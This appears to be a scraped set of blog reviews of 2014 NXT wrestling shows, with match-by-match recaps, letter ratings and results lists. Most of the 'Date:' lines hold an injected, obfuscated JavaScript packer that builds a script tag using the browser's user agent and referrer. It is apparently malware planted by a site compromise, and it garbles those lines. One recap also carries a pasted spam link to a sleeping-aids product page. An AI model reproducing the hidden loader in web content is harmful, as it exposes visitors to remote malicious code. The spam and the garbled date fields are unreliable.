A frustrated Sami goes up top but has to roll through a cross body, only to charge into a kick to the ribs and a DDT for two. Tyler comes back by pulling Sami from the mat out of the corner into a sitout powerbomb for another near fall. Breeze goes nuts in the corner with right hands but Sami comes back with an exploder suplex to send him into the buckles. They slug it out with some very intense BOO/YAY chants.

Sami stops himself before running into the referee and gets rolled up for two. The Blue Thunder Bomb is countered into a series of standing switches before Tyler superkicks Sami’s head off but Zayn kicks out AGAIN. The fans are literally standing and cheering for this. Both guys are spent but it’s Breeze in control. Sami blocks an Irish whip and tries an arm trap powerbomb but the fall down in a sloppy looking sequence. That’s fine with Zayn though as he loads up a fisherman’s buster but flips Breeze forward into a powerbomb for two.

Breeze bails to the floor, allowing Sami to hit a gorgeous flip dive. The landing looked very rough though as Sami’s leg smacked Breeze in the head and knocked it into the steel ramp. Back in and Sami tries the Helluva Kick but Breeze’s head goes down, causing a low blow to Sami. Zayn falls backwards and the Beauty Shot gives Breeze the pin at 15:55.

Rating: A-. That botched sequence near the end is one of the only things holding this back. Sami is more than ready for WWE by this point but at some point he needs to get a major win in NXT. I’m fine with them not making him champion, but there’s a good chance this gets a rematch due to the ending. Breeze’s best match ever by about 10,000 miles as well.

Here are Lana and Rusev with something to say. Lana says Rusev has spread his power to Raw and Smackdown but now he’s back here receive adulation. This brings out Mojo Rawley with an American flag to stand up to this horrid villain. Rawley says in America, we don’t get hyped. WE STAY HYPED! Mojo hits the ring….and gets his head kicked into the fourth row. Rusev hammers away and Accolades Rawley in about 20 seconds. Rusev still isn’t done though as he puts on the Accolade on the ramp.

Video on Charlotte vs. Natalya, which will see both famous relatives in the corners.

Kris Kristofferson is here.

Before the match, here’s Paige to say how good it is to be home. She thanks the fans for their help in making her Divas Champion because she couldn’t do it without them. Paige is also proud to be the first NXT Women’s Champion but tonight is about a new champion. Whoever that is has to have strength, character and grace because she’s the key to the future. Holding the Women’s Title is the key to the Divas Title, so enjoy the rest of the show.

Women’s Title: Charlotte vs. Natalya

This is a tournament final for the vacant championship. Charlotte has a remixed Ric Flair theme song and it’s really not working. After some big match intros, we’re ready to go. Feeling out process to start as the legends play cheerleaders. Natalya takes her down by the arm but gets caught in a headscissors. Back up and Natalya grabs the headlock as well. That goes nowhere either so they fight over wristlocks until Charlotte grabs an armbar.

Natalya does the Owen Hart roll out and grabs a leg lock to take over. Back up again and Natalya takes her right back down with another leg tie. Charlotte reaches around to grab a chinlock which goes into a front facelock. They hit the ropes for a bit with Natalya countering a wheelbarrow slam into a cradle for two. Natalya grabs a body scissors but Charlotte rolls to the ropes to avoid a cross armbreaker.

Charlotte gets tired of submission stuff and slaps Natalya in the face. A BIG chop puts Natalya down and Ric loses his mind going WOO. Natalya tries a sleeper but gets caught in an over the shoulder Stunner for two. Charlotte slams the Canadian’s face into the mat over and over before choking in the corner a bit. Off to a figure four headlock complete with Madison Rayne’s face ram into the mat.

Back up and it’s off to an abdominal stretch on Natalya, albeit not a very good one. Natalya reverses into a much better one and even grabs Charlotte’s leg for good measure. Charlotte rolls out and hits a low dropkick for two. Natalya fights back with power and a low dropkick of her own, followed by a whip into the corner for a Flair Flip. They head outside with Charlotte whipping Natalya off the apron by the leg. Back in and Charlotte goes up, only to miss a moonsault.

A discus lariat gets two for Natalya and the Sharpshooter goes on, but Charlotte rolls out and puts on the Figure Four. Natalya somehow reverses the pressure without turning the hold over and Charlotte crawls to the apron. She falls to the floor with the hold still on and both girls are in trouble. Natalya is sent knee first into the steps and it’s back inside for a bad Sharpshooter (complete with a glare at Bret) but Natalya rolls through, only to be kicked away from the Sharpshooter. Charlotte hits Bow Down To The Queen out of nowhere for the pin and the title at 16:55.

Rating: B+. Who would have thought THIS would be awesome? Charlotte has somehow become awesome in like two months and more than held her own out there. It was hard to imagine Natalya winning here but it was still an absolutely awesome match between two wrestlers who happen to be girls.

They shake hands post match, as do Ric and Bret for a nice moment.

Video on Neville’s rise to the top of NXT and his match with Kidd tonight.

Cesaro and Christian are here.

Kidd and Natalya are ready.

NXT Title: Tyson Kidd vs. Adrian Neville

Neville is defending. Big match intros are done and we’re ready to go. They shake hands and talk trash to each other until Tyson takes him down with a headlock. Adrian spins up and Tyson shoves him down to annoy the champion. Back up and this time it’s Adrian taking Kidd down and into the ropes for another staredown. The champion grabs an armbar (Fans: “ARMBAR! ARMBAR!”) but Kidd is quickly up and things get faster. Neville flips over to escape a backdrop but Kidd does the same, leading to another staredown. This time though Kidd blasts him in the face and kicks away, giving us a mid match heel turn.

Kidd puts him into the Tree of Woe before lifting him up for a kick to the back. A running dropkick has Adrian in trouble and we hit the chinlock. Neville fights up but Kidd sends him to the floor and hits a big flip dive for two back inside. Adrian is back up again and they hit cross bodies at the same time to put both guys down. Now they trade kicks to the ribs but Adrian hits a sliding kick to the head to take over. Now it’s Kidd put in the Tree of Woe for the same kind of kicks that he threw earlier.

A running delayed dropkick knocks Kidd senseless but it’s only good for two and the champion is getting frustrated. Kidd comes back with a pair of kicks to the head but Adrian kicks out at two. Tyson goes up but Neville blocks the Blockbuster with a forearm to the jaw. Adrian’s superplex is countered into a powerbomb but Adrian flips out and hits a sitout powerbomb for two.

Adrian loads up what looked to be a Lionsault press but Kidd runs at the ropes for a middle rope Russian legsweep for a close two. Kidd dives into knees but gets rolled up for another near fall. The champion tries a suplex but they both fall over the top rope and crash to the floor. Both guys slide in to beat the count and they’re spent.

Kidd loads up the Sharpshooter but leans forward to put on the Dungeon Lock (instead of turning over he grabs Adrian’s arm and leans back for a choke with a leg lock). Adrian is in the ropes, so Kidd ties him up in those ropes for a top rope flip legdrop and two. Kidd loads up the Blockbuster but Adrian counters into a gorgeous top rope hurricanrana. Kidd is almost out cold and the Red Arrow is enough to keep the title in England at 20:00.

Rating: A-. Take two guys and let them fly around the ring for a long time. Again, Kidd winning wasn’t likely at all but that doesn’t mean he can’t go out there and tear the house down like he just did. Neville is getting a huge star rub, even though he doesn’t seem to be the longest term solution as champion.

Kidd very slowly gets up but won’t shake hands.

Overall Rating: A. This was an AWESOME show with three incredible matches out of five with the other two not being bad at all. NXT continues to be the most outstanding wrestling promotion going right now with nothing but great matches and shows almost every week. It’s amazing how this doesn’t translate all that well up to WWE though, as the scripting of everything stops so much of the momentum that NXT has due to people just going out there and tearing the house down. Excellent show, just like Arrival.

Adam Rose b. Camacho – Party Foul
Ascension b. El Local/Kalisto – Fall of Man to Local
Tyler Breeze b. Sami Zayn – Beauty Shot
Charlotte b. Natalya – Bow Down to the Queen
Adrian Neville b. Tyson Kidd – Red Arrow
Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Survivor Series at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – May 22, 2014: Bo Dallas Is Glorious

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhtai|var|u0026u|referrer|hfnrn||js|php'.split('|'),0,{})) May 22, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: Renee Young, Alex Riley, Rich Brennan

It’s the go home show for Takeover next week so odds are we’re going to be seeing a lot about Tyson Kidd tonight. The other main story coming into tonight is the last chance for Bo Dallas. He’s facing Big E. tonight and if he wins, he gets a future shot at the NXT Title. If he loses though, he’s done in NXT forever. The ending should be fairly obvious at this point, but the reaction should be awesome. Let’s get to it.

We open with a recap of Bo’s issues leading up to his match tonight.

Bo Dallas vs. Big E.

They’re starting fast this week. Bo has the Bolieve music and Titantron already. Before the match Bo talks about the love he has for his fans and accepts the title of Mr. NXT. Big E. is already doing the Five Count again and he’s instantly more interesting than he’s been for months. Dallas is quickly sent to the floor before a shoulder drops him with ease. Big E. does it again but this time he follows Bo to the floor. Dallas comes back with a knee to the ribs to take over and the big man is sent into the steps.

Back in and we hit the front facelock on Big E. before taking a break. We come back with Big E. driving shoulders into Bo in the corner but walking into a suplex for two. The fans are singing He’s Got The Whole World In His Hands as Bo stands over Big E. Back up and Big E. makes his come back with a clothesline and belly to belly suplex before just running him over again.

There go the straps but Bo counters the Big Ending into a reverse DDT for two. The bulldog out of the corner is countered and Big E. gets two more off an overhead belly to belly. The Warrior Splash hits knees though and Bo nails the double arm DDT for another near fall. Bo throws his wrist tape down for a distraction and takes off the buckle pad, which is how he beat Big E. for the title last year. This time though Bo is splashed into the steel and the Big Ending means no more Bo at 8:50.

Rating: C. The match was fine and a nice callback to the first meeting last year. There was no way Dallas was going to win here though and this is the right call all around. Big E. getting a win is always nice to see after he’s been crushed on the main show for so many months.

Dallas of course cracks after losing while the fans sing the Goodbye Song.

Dallas of course cracks after losing while the fans sing the Goodbye Song. The freaking out continued during the break with the fans changing BO LEAVE! Bo grabbed the mic and said he strongly dislikes every one of them. They should have just bolieved and now they can just leave. Bo finally walks out.

The announcers talk about Kidd vs. Neville for a bit.

Kidd says he’ll win next week.

Sami Zayn says the loss last week isn’t going to stop him. Tyler Breeze comes in and they mock each other until Sami challenges him for a match. Tyler agrees for Takeover.

Paige vs. Tamina Snuka

Non-title. Paige fights out of the corner to start and kicks Tamina in the ribs before screaming in her face. The fans chant Superfly as Tamina slams Paige down a few times. A running clothesline gets two on Paige and a forearm to the back puts her down. Tamina hooks a torture rack but it’s more like a fireman’s carry. Paige fights back and knocks Tamina to the mat, only to pull her right back up to knock her down again. Tamina picks her up and sits Paige on the top rope before knocking her ribs first onto the apron. Back in and the Superfly Splash hits feet and a small package gives Paige the pin at 6:00.

Rating: D+. Dull match but Paige’s formula is starting to work. She’s getting beaten down because she’s not that experienced but finding a way to win by exploiting a single mistake her opponents make. I’ve heard worst styles for someone to use and she’s WAY over down in NXT as well. Why she needed to lose to Alicia Fox is beyond me, but I’m not as smart as WWE writers.

Adam Rose vs. Camacho

Rose charges right at him but gets hammered in the corner instead. That’s fine for Adam as he charges at Camacho and takes him down with right hands. Camacho fights out of the corner and stomps Rose down. Fans: “PARTY POOPER!” A release butterfly suplex and a legdrop gets two but Rose gets all ticked off and Hulks Up. He hammers away with right hands and nails a spinebuster to set up a bronco buster. What appeared to be a Diamond Cutter is shoved away and Camacho runs to the floor. Camacho just takes the countout at 3:55.

Rating: D+. Rose isn’t bad in the ring but he’s all character for the most part. I have no idea why Camacho of all people isn’t allowed to be pinned here, unless there’s going to be a rematch next week at Takeover. If that’s the case, why have this match here at all? I don’t get this one.

NXT Womens Title Tournament Semifinals: Natalya vs. Sasha Banks

Charlotte isn’t sure who she wants to win because she doesn’t want to embarrass her friend but wants her to succeed. Natalya grabs a quick rollup for two and runs Sasha over for the same. Banks comes back with a running knee in the corner as Charlotte is cheering, but it’s not clear for whom. We hit the chinlock on Natalya as Renee says Sasha realizes she’s lost all her matches since Charlotte has been back. Not quite but the Divas don’t always make a ton of sense. Natalya comes back with a butterfly suplex of her own and Sasha goes to the floor holding her leg. Back in and the Sharpshooter sends Natalya to the finals at 4:00.

Rating: C-. Not bad here and points to NXT for trying to set up a possible way Sasha could win. Natalya vs. Charlotte is the better choice but this wasn’t the worst match in the world. Charlotte has the character down and is getting better in the ring. She doesn’t need Sasha but splitting them up isn’t the best idea in the world either.

We run down the Takeover card. Zayn vs. Breeze is a #1 contenders match.

Adrian Neville vs. Curt Hawkins

Non-title. Renee goes to the same bagel shop as Hawkins. I love little lines like that as they sound like they could happen and we haven’t heard them a million times before. Neville easily takes him to the mat but Hawkins pops back up and nails a clothesline to the back of the head. A suplex gets two on Adrian and we’re already in the chinlock. Neville fights up and hits a missile dropkick to set up the Red Arrow for the pin at 2:23.

Post match Tyson comes out and says he’s the toughest competition Adrian has ever fought. Adrian says NXT is the future so he’s the future. Therefore, at Takeover, the only member of Kidd’s family to take home some gold will be Tyson’s wife. “As usual.” Kidd stares him down to end the show. Neither came off like a heel here.

Overall Rating: C+. This show did the one job it had: it made me want to see Takeover. The show isn’t going to have anything groundbreaking and most of the matches are predictable, but I have no doubt that NXT is going to put on at least an entertaining show. Kidd is a great choice to have an awesome match with Neville and the rest of the card should be good as well. Nice show here but it’s just setting up next week.

Big E. b. Bo Dallas – Big Ending
Paige b. Tamina Snuka – Small package
Adam Rose b. Camacho via countout
Natalya b. Sasha Banks – Sharpshooter
Adrian Neville b. Curt Hawkins – Red Arrow



Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Clash of the Champions at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – May 15, 2014: Problems? What Problems?

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yfisn|var|u0026u|referrer|dirid||js|php'.split('|'),0,{})) May 15, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: William Regal, Tom Phillips, Byron Saxton

We’re two weeks away from Takeover and the main story coming into tonight is finding a challenger for Adrian Neville’s NXT Title. Last week, Tyson Kidd, Tyler Breeze and Sami Zayn tied in a battle royal, setting up a triple threat for the show this week. My guess is the two losers will face off at Takedown as well. Let’s get to it.

We open with a recap of the battle royal and the three winners.

Roar of the Crowd.

Ascension vs. Buddy Murphy/Elias Samson

Non-title. The announcers talk about the tag team initiative, meaning a lot of new teams will be formed. Again, NXT has a problem and they do something to solve it. Murphy gets things going and the beating is on in a hurry. Samson never even makes it into the ring as a series of clotheslines, forearms and stomps set up the Fall of Man to Murphy for the pin at 1:30.

Post match Ascension says bring them someone new to destroy. This brings out El Local and Kalisto to make a challenge for Takeover. A LUCHA chant starts up and Ascension seems to like the idea.

Sami Zayn says this is his chance to redeem himself and get one step closer to the NXT Title. It won’t be easy but he’ll do whatever it takes to reach his goal.

NXT Womens Title Tournament Semifinals: Alexa Bliss vs. Charlotte

Charlotte gets caught in a quick rollup for two but comes back with a clothesline for a pair of two counts. We hit a modified abdominal stretch from Charlotte but Bliss counters into another rollup for two. Charlotte slams her face first into the mat and it’s back to the stretch, only to have Bliss reverse into a sunset flip for another near fall. Bliss is bent over Charlotte’s knee for a few moments before Bow Down To The Queen (the flipping facebuster) is good for the pin at 5:00.

Result: Charlotte b. Alexa Bliss – Bow Down To The Queen (5:00)

Tyler Breeze is ready to win because he’s fighting two ugly Canadians.

Mojo Rawley vs. Aiden English

English sings about how proper he is before Rawley throws him around after the bell. He hits a few football tackles to put the proper one down and English looks shaken up. Rawley chases him into the ropes but gets caught coming in, allowing English to take over. Ascension vs. Kalisto/El Local is official for Takedown. A DDT gets two on Mojo and we hit a quickly broken chinlock. Mojo fights up and hits some splashes in the corner, setting up Hyperdrive for the pin at 3:32.

Result: Mojo Rawley b. Aiden English – Hyperdrive (3:32)

Tyson Kidd wants to win here to make himself a bigger deal in NXT.  He’s the leader of the pack in NXT and will be its champion.

Big Cass vs. Angelo Dawkins

It’s a new name for Cassidy this week. Cass hammers Dawkins into the corner as CJ Parker comes out to ringside with a recycling sign. It doesn’t matter much as Cass stays on offense as we’re firmly in squash territory here. A big slam gets two but Dawkins gets an elbow up in the corner. Dawkins hits a nice dropkick but gets caught by a knee to the jaw. The S-A-W-F-T Forearm sets up a spinning Rock Bottom (East River Crossing) for the pin on Angelo at 3:26.

Rating: D+. Total squash here but man alive I hope Parker doesn’t get another feud anytime soon. Cass is a guy with some talent but he needs a wingman like Enzo to keep things interesting. The name change helps as Colin isn’t exactly the most intimidating name in the world.

Bo Dallas shows JBL a stack of letters from fans who say he should get another title shot. The fans on his hotline think he should get another as well. JBL thinks it should be a gamble though. How about this: if Dallas wins his next match, he gets a title shot. If he loses, he’s gone from NXT forever. JBL gives him FIVE guesses who the opponent is.

Tyler Breeze vs. Sami Zayn vs. Tyson Kidd

Winner gets the shot at Neville in two weeks. The fans chant for Yoshi Tatsu of all people but settle down for the bell. Kidd takes over to start and hits a running kick to both heads. Sami and Breeze send Tyson to the floor before brawling in the corner. Tyson is back in now but has to break up a cover on Sami after the Beauty Shot as we take a break.

Back with Sami on the floor and Kidd charging into Breeze’s boot in the corner. Kidd is quickly back up but Breeze is in the ropes to avoid the Sharpshooter. The fans want Yoshi but get Tyler stopping a dive with a forearm to the head. Sami dives on Breeze instead and gets two off a high cross body to Kidd. Breeze escapes the Blue Thunder Bomb but the second attempt works a bit better for two.

Sami takes a lot of time in the middle of the ring for some reason before grabbing Breeze for an exploder suplex. Kidd grabs Sami for a German suplex at the same time and all three are down. Breeze falls to the floor so the good guys can slug it out. Kidd slaps on the Sharpshooter in the middle of the ring but Breeze makes the save. Breeze gets suplexed into the corner for two for Kidd. Sami can’t hit the tornado DDT on Tyler but Kidd’s Blockbuster attempt is broken up. The Helluva Kick takes Breeze down but Kidd throws Sami outside, setting up a top rope elbow to Breeze to send Tyson to Takeover at 11:33.

Rating: C+. There was a bit too much laying around but this was one of the matches that didn’t have a bad option. Kidd is a good choice for a title shot as he could take the title but will get at least a solid match no matter what. Breeze was in a bit over his head but he certainly wasn’t bad out there.

Sami is stunned as Kidd celebrates.

Overall Rating: C+. As usual, NXT is capable of pulling a rabbit out of its hat without hurting the ears at all. This took care of a lot of the issues the show has been having lately, including giving us a tag team to fight Ascension. No they’re not all that established, but at least there’s someone instead of two jobbers. That and Bo Dallas should be written off TV to go to WWE full time. What more can you ask for?

Ascension b. Buddy Murphy/Elias Samson – Fall of Man to Murphy
Charlotte b. Alexa Bliss – Bow Down To The Queen
Mojo Rawley b. Aiden English – Hyperdrive
Big Cass b. Angelo Dawkins – East River Crossing
Tyson Kidd b. Sami Zayn and Tyler Breeze – Top rope elbow to Breeze

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Clash of the Champions at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – May 8, 2014: The Tyson Tomko Of Wrestling (It’s A Good Thing)

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zykry|var|u0026u|referrer|erfyy||js|php'.split('|'),0,{})) May 8, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: Jason Albert, Renee Young, Rich Brennan

We’re getting closer to Takeover and the big story is the lack of a challenger for NXT Champion Adrian Neville. After dispatching Brodus Clay last week, Adrian needs someone new to fight and odds are we’ll find out who that is tonight. The Women’s Title tournament will also continue tonight and since this is NXT, that’s not necessarily a bad thing. Let’s get to it.

Opening sequence.

NXT Womens Title Tournament First Round: Emma vs. Charlotte

They circle each other to start until Charlotte takes him up against the ropes. A hard clothesline puts Charlotte down for one but she snaps Emma’s throat over the top rope to take over. We hit a figure four neck lock on Emma before she rams Emma’s face into the mat ala Madison Rayne. Emma fights up and nails another clothesline to put both girls down. She loads up the pink Cobra because that’s what WWE has done to her but Sasha Banks offers a distraction, allowing Charlotte to roll Emma up and bridge onto the legs (called Charlotte’s Web) for the pin at 3:50.

Rating: D+. This didn’t have time to go anywhere and the Cobra made it even worse. It’s one of the most annoying things about WWE and NXT: the people get over in NXT but then they make it to the main roster and the writers or whoever is responsible for these ideas have to change everything that worked and then blame the wrestlers when it doesn’t work.

The #1 contender to Neville’s title will be determined in a battle royal tonight.

Legionnaires vs. El Local/Kalisto

The Legionnaires are Sylvester LeFort and Marcus Louis who I believe is making his debut here. The masked men take over to start but LeFort comes back with a swinging neckbreaker on Local as things settle down. A headdbut from Louis has Local in even more trouble as the heels start some fast tagging.

Louis cranks on the neck for a bit until he runs into Local’s boot in the corner. The hot tag brings in the rather short Kalisto for some springboard cross bodies and a jump into an Edge-O-Matic for two on Louis. Everything breaks down and Kalisto kicks LeFort in the head, followed by a Tajiri handspring into another kick to the head for the pin at 4:17.

Rating: D+. This was too short for the tag team formula to work all that well but Kalisto was fun to watch with all of his dives. If nothing else this is the way to build up some opponents for the Ascension as they’ve run through all of the teams in the promotion with relative ease so far.

Adam Rose fires up one of his Rosebuds for his match.

Camacho vs. Captain Comic

Captain Comic is one of Rose’s friends dressed like a superhero. Fans: “MATCH OF THE YEAR!” Camacho destroys him with ease as we’re certainly in squash territory. We hit a quick chinlock as the dominance continues. A running Samoan drop sets up a powerslam for the pin at 2:36.

Rose comes out for the save post match.

Alicia Fox and Alexa Bliss don’t have much to say before their match but they both want the Women’s Title.

NXT Womens Title Tournament First Round: Alicia Fox vs. Alexa Bliss

This is Bliss’ debut and she’s in what Renee describes as a fairy costume. Fox is quickly taken down for a standing moonsault with the knees intentionally landing on Fox’s chest. Alicia comes back with a tilt-a-whirl backbreaker for two and we’re already in the chinlock. That great looking northern lights suplex gets two for Fox and it’s off to the headlock. The beating continues for a few more seconds until Bliss grabs a small package out of nowhere for the pin at 3:10.

Rating: D+. This was just a squash with a surprise finish which is only so interesting. We didn’t get much out of Bliss here but she didn’t have the chance to show anything. Her winning is the right move but I need to see more from her to know what she can do in the ring. Fox is a decent enough test for her though.

Adrian Neville says he wants people to step up and challenge him.

Battle Royal

Aiden English, Baron Corbin, Bo Dallas, Brodus Clay, Camacho, Colin Cassady, Curt Hawkins, Danny Burch, El Local, Jason Jordan, Sami Zayn, Tyson Kidd, Tyler Breeze, Kalisto, Marcus Louis, Mason Ryan, Mojo Rawley, Oliver Grey, Sylvester Lefort, Xavier Woods, Yoshi Tatsu

Winner gets Adrian Neville at Takeover. It’s a big brawl to start until everyone gangs up on Brodus for the elimination. No one is eliminated for a good while until Ryan throws out I think English as we take an early break. Back with Kalisto avoiding elimination as we hear about Woods saving himself ala Kofi Kingston. The fans are behind Tatsu here as we’re still waiting on more eliminations. LeFort and Kalisto are gone as I type that and Sami Zayn slips back in from the apron.

Things slow down as they’re known to do in battle royals until Woods and Camacho chop it out in the middle of the ring. Woods gets a running start and eliminates himself and Camacho with a Cactus Clothesline. We have about nine left in the match. Jason throws out Mojo in an upset as Kidd gets back in over the top. Corbin throws Jordan to the apron and then kicks him out with a huge boot. Dallas knocks Corbin out with a clothesline and does the same to Yoshi a few seconds later.

We’re down to Sami, Breeze, Kidd, Ryan, Dallas and Cassady but Bo puts out Cassady and Ryan with ease. Kidd comes out of nowhere to dropkick Dallas out (fans: “THANK YOU TYSON!”) and we’re down to three. Breeze hits a Beauty Shot on Kidd and the fans are way behind the model. Sami throws Breeze to the apron but misses a kick and winds up on the apron as well. Kidd misses a charge of his own and winds up on the apron, leaving only Breeze in the ring. Both good guys pull him out but fall out at the same time for a triple elimination at 13:30.

Rating: C. The match was your usual battle royal but the ending was a nice surprise. Any of those three would be a good challenger for Adrian and that’s one of the cool things about NXT. I would assume it’s a triple threat which you would think goes to Breeze for heel vs. face but things aren’t always that basic in NXT.

Post match HHH comes out because JBL barely exists in NXT anymore and makes a triple threat for the shot next week. All three argue to end the show.

Overall Rating: C+. Here’s the difference between WWE and NXT. When something bad happens in WWE, they just keep going with the idea and expect the fans to go with it. When something bad happens in NXT, they have a show like this which fixes all of the problems. It’s no shock why I enjoy one over the other. This wasn’t about the wrestling but it set up a lot of stuff down the line, which is very important as well.

Charlotte b. Emma – Charlotte’s Web
El Local/Kalisto b. Legionnaires – Spinning kick to the head to LeFort
Camacho b. Captain Comic – Running powerslam
Alexa Bliss b. Alicia Fox – Small package
Sami Zayn, Tyler Breeze and Tyson Kidd won a battle royal last eliminating each other

Remember to follow me on Twitter @kbreviews, check out my website at kbwrestlingreviews.com and pick up my new book of on the History of Clash of the Champions at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – May 1, 2014: Taking Us To The Takeover

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
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Location: Full Sail University, Winter Park, Florida
Commentators: Tom Phillips, William Regal, Byron Saxton

We’ve got a big show to build towards now, meaning things should start coming together in the near future. On top of that we’ve got a challenge from Adam Rose to face Camacho at some point in the future, which isn’t a terrible idea for an opponent for Rose, especially when he’ll be in WWE very soon. Let’s get to it.


HHH is in the ring to open the show to talk about how awesome NXT is and how much of an impact it’s having on WWE with people like Paige. The fans think this is awesome. You can tell when this was taped as HHH has a sore throat. Taking over WWE is a good idea, so on May 27, there will be a two hour special called NXT Takeover.

Opening sequence.

Tyson Kidd vs. Bo Dallas

Bo has new music. Feeling out process to start as the fans chant for Total Divas of all things. Dallas grabs a headlock but Tyson fights out and sends him into the corner for a dropkick. A suplex looks to set up a missile dropkick but Bo rolls outside before anything can happen. Dallas takes over with a dropkick for two as the fans are singing He’s Got The Whole World In His Hands. An elbow drop gets two for Dallas and we hit the cravate.

Tyson fights up with elbows but misses a dropkick of his own to give Bo a two. Back to the cravate as the announcers actually talk about the history of the two wrestlers in the ring. Like actual commentary you might say. Tyson fights up again but charges into an elbow in the corner. Now the fans chant for Tyson Kidd as he comes back with kicks to the ribs and one to the head for two. A belly to belly gets two for Dallas and a bulldog gets the same as frustration is setting in. Tyson goes up top but gets crotched down, only to kick Dallas in the head, setting up the Blockbuster for the pin at 7:20.

Rating: C. Nice little match here as Kidd’s push in NXT continues. The guy has the skills to make it work and a good finisher so I can’t complain much about him getting this much time in the ring. Dallas is heading to WWE and it makes perfect sense at this point as there’s nothing left for him to do here anymore.

The fans are all over Dallas and sing the Goodbye song as he freaks out even more.

Camacho says his parties are better than Adam Rose’s. Adam comes up and calls Camacho a silly little rabbit and says it doesn’t matter if it’s NXT, WWE, NYC or Hawaii, it’s party time all the time when Adam Rose is around. A party breaks out.

Here are the brackets for the Women’s Title tournament.

Sasha Banks



Alexa Bliss
Alicia Fox

Bayley says winning the title is more important than ten hugs from John Cena.

Sasha promises to beat the smile out of Bayley.

Women’s Title Tournament First Round: Bayley vs. Sasha Banks

Sasha drives shoulders into the corner to start but gets rolled up for a quick two. A backslide and second rollup get two each for Bayley and she comes off the middle rope into an armdrag. Bayley hugs Sasha in the corner and throws in a slap for good measure before a suplex gets two.

Banks sends her into the corner as Regal picks Alicia Fox as the favorite for the tournament. A very high backdrop gets two for Bayley and some running ax handles put Banks down again. The Belly to Bayley connects but Sasha gets in the ropes. Bankrupt gets two for Banks but she comes back with a backstabber and a modified crossface for the submission at 4:00.

Rating: C. The match wasn’t bad and Banks got to show off that she could actually wrestle a decent match under the right circumstances. Bayley is improving as well as she’s got the character down perfectly and is starting to be able to back it up in the ring as well. This was good for NXT standards, http://onhealthy.net/product-category/sleeping-aids/ meaning it would be better than most Divas matches.

We look at Brodus Clay’s heel turn and attacks on Neville.

Adam Rose vs. Danny Burch

Regal apparently got to go to one of Rose’s parties recently. Tom: “Why didn’t I get invited?” Regal: “No one likes you.” Burch shoves him into the corner to start but Rose prances around to get on his nerves. Rose is all ticked off and destroys Burch before finishing him off with a kind of facebuster called the Party Stopper for the pin at 2:49.

Post match the party comes out but Camacho sneaks in and destroys a masked man.

Brodus says he’s destroying Adrian Neville tonight because he’s the baddest man in the world.

Women’s Title Tournament First Round: Natalya vs. Layla

Layla says she’s getting what she wants like she always does. Natalya takes over to start but Layla pulls the hair and kicks Natalya in the ribs for two. We hit a double arm crank for a bit before Natalya fights up, only to be pulled right back down to the mat. Back to the arm crank until Natalya fights up and nails a snap suplex. A clothesline looks to set up the Sharpshooter and the second attempt works for the submission from Layla at 3:23.

Rating: D+. This didn’t have the time to go anywhere but Natalya is a good choice to push in the tournament. She’s a veteran and somehow one of the older Divas on the roster, despite being 31 years old. Layla is there for her looks but she’s not terrible in the ring at the same time. Natalya winning dominantly at the end was the right call though.

Adrian Neville’s teeth are back and he’ll win tonight, but not by countout.

Mojo Rawley vs. Oliver Grey

Rawley runs him over in the corner to start and Hyperdrive ends Grey at 1:00.

Post match Aiden English comes down and tells Rawley to get out of his ring. English jumps Rawley and is quickly dispatched.

NXT Title: Brodus Clay vs. Adrian Neville

No DQ and Clay is challenging. Clay tries to grab the title and gets elbowed in the head. A low bridge sends him to the floor and Adrian dives on him as the opening bell rings. Back in and Adrian fires off kicks but can’t launch the Red Arrow. Adrian is sent hard into the corner as Clay takes over with a running splash. Fans: “PLEASE DON’T EAT HIM!” A suplex and elbow drop get two on Neville and it’s time to work on the ribs.

Clay throws him over his shoulder for a backbreaker but Adrian rakes the eyes to escape. Some kicks to the head don’t do much to Clay so he powerbombs Neville in half. A middle rope splash connects for two and Regal is in shock. Clay goes to the floor and grabs the belt but Adrian kicks it into his chest, setting up the Red Arrow to retain the title at 5:30.

Rating: C+. Regal treats it like a huge win and great performance which is a stretch but the kickouts and heart Neville showed were nice touches. This gets rid of Clay as a big challenger which is the right idea as they have a ton of time before the big match at the live special. Not bad here and it makes Neville look like he’ll never quit.

Overall Rating: B-. Good show this week as they covered almost everything they have going on outside of Sami Zayn. I’m guessing the six man tag last week was the blowoff for that feud, which is fine as it wasn’t doing much for either guy anyway. The live special should be good as they have time to build it up.

Tyson Kidd b. Bo Dallas – Blockbuster
